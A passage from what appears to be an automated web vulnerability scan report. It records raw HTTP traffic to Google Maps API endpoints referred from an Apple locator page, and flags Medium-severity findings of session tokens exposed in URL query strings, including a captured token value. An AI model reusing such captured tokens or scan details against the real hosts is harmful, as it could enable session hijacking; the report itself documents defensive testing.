Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Thu, 21 Jul 2011 20:43:11 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._74pqj6 && _xdc_._74pqj6( [1] )

8.7. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i2470098&2i3152897&2e1&3u15&4m2&1u378&2u377&5m3&1e0&2b1&5sen-US&token=72762 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Thu, 21 Jul 2011 20:41:30 GMT
Expires: Fri, 22 Jul 2011 20:41:30 GMT
Server: staticmap
Content-Length: 43726
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 99

...[SNIP]...

8.8. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The URL in the request appears to contain a session token within the query string: